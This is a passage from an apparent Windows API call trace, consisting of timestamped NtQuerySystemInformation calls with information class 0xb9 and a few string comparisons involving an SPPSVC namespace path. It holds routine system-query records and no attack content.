SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb40, Length=0x38, ResultLength=0x0) [0185.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb40, Length=0x38, ResultLength=0x0) [0185.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x20, ResultLength=0x0) [0185.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd950, Length=0x20, ResultLength=0x0) [0185.878] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd950, Length=0x20, ResultLength=0x0) [0185.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.879] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf70, Length=0x50, ResultLength=0x0) [0185.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf70, Length=0x50, ResultLength=0x0) [0185.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf70, Length=0x50, ResultLength=0x0) [0185.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde60, Length=0x50, ResultLength=0x0) [0185.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde60, Length=0x50, ResultLength=0x0) [0185.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde60, Length=0x50, ResultLength=0x0) [0185.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde60, Length=0x50, ResultLength=0x0) [0185.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd90, Length=0x38, ResultLength=0x0) [0185.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x28, ResultLength=0x0) [0185.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x28, ResultLength=0x0) [0185.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x28, ResultLength=0x0) [0185.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc30, Length=0x28, ResultLength=0x0) [0185.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd90, Length=0x38, ResultLength=0x0) [0185.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcb0, Length=0x28, ResultLength=0x0) [0185.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcb0, Length=0x28, ResultLength=0x0) [0185.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd90, Length=0x38, ResultLength=0x0) [0185.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0185.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb90, Length=0x20, ResultLength=0x0) [0185.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb90, Length=0x20, ResultLength=0x0) [0185.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb90, Length=0x20, ResultLength=0x0) [0185.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.891] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd90, Length=0x38, ResultLength=0x0) [0185.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0185.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x20, ResultLength=0x0) [0185.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x20, ResultLength=0x0) [0185.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf70, Length=0x50, ResultLength=0x0) [0185.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf70, Length=0x50, ResultLength=0x0) [0185.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf70, Length=0x50, ResultLength=0x0) [0185.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde60, Length=0x50, ResultLength=0x0) [0185.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde60, Length=0x50, ResultLength=0x0) [0185.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde60, Length=0x50, ResultLength=0x0) [0185.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde60, Length=0x50, ResultLength=0x0) [0185.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd90, Length=0x38, ResultLength=0x0) [0185.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x28, ResultLength=0x0) [0185.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x28, ResultLength=0x0) [0185.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbc0, Length=0x28, ResultLength=0x0) [0185.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc30, Length=0x28, ResultLength=0x0) [0185.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd90, Length=0x38, ResultLength=0x0) [0185.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0185.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcb0, Length=0x28, ResultLength=0x0) [0186.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdcb0, Length=0x28, ResultLength=0x0) [0186.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd90, Length=0x38, ResultLength=0x0) [0186.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0186.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb90, Length=0x20, ResultLength=0x0) [0186.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.029] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb90, Length=0x20, ResultLength=0x0) [0186.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb90, Length=0x20, ResultLength=0x0) [0186.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd90, Length=0x38, ResultLength=0x0) [0186.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc10, Length=0x20, ResultLength=0x0) [0186.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x20, ResultLength=0x0) [0186.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x20, ResultLength=0x0) [0186.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe020, Length=0x50, ResultLength=0x0) [0186.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfa0, Length=0x28, ResultLength=0x0) [0186.031] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0186.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe020, Length=0x50, ResultLength=0x0) [0186.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe020, Length=0x50, ResultLength=0x0) [0186.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe020, Length=0x50, ResultLength=0x0) [0186.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf50, Length=0x38, ResultLength=0x0) [0186.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd80, Length=0x28, ResultLength=0x0) [0186.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd80, Length=0x28, ResultLength=0x0) [0186.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd80, Length=0x28, ResultLength=0x0) [0186.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddf0, Length=0x28, ResultLength=0x0) [0186.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf50, Length=0x38, ResultLength=0x0) [0186.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde70, Length=0x28, ResultLength=0x0) [0186.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde70, Length=0x28, ResultLength=0x0) [0186.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf50, Length=0x38, ResultLength=0x0) [0186.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd0, Length=0x20, ResultLength=0x0) [0186.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd50, Length=0x20, ResultLength=0x0) [0186.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd50, Length=0x20, ResultLength=0x0) [0186.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd50, Length=0x20, ResultLength=0x0) [0186.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf50, Length=0x38, ResultLength=0x0) [0186.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddd0, Length=0x20, ResultLength=0x0) [0186.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd60, Length=0x20, ResultLength=0x0) [0186.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd60, Length=0x20, ResultLength=0x0) [0186.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe020, Length=0x50, ResultLength=0x0) [0186.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdfa0, Length=0x28, ResultLength=0x0) [0186.045] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0186.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe020, Length=0x50, ResultLength=0x0) [0186.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe020, Length=0x50, ResultLength=0x0) [0186.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe020, Length=0x50, ResultLength=0x0) [0186.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf50, Length=0x38, ResultLength=0x0) [0186.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd80, Length=0x28, ResultLength=0x0) [0186.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd80, Length=0x28, ResultLength=0x0) [0186.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdd80, Length=0x28, ResultLength=0x0) [0186.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fddf0, Length=0x28, ResultLength=0x0) [0186.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf50, Length=0x38, ResultLength=0x0) [0186.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0186.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde70, Length=0x28, ResultLength=0x0) [0186.053] NtQuerySystemInformation 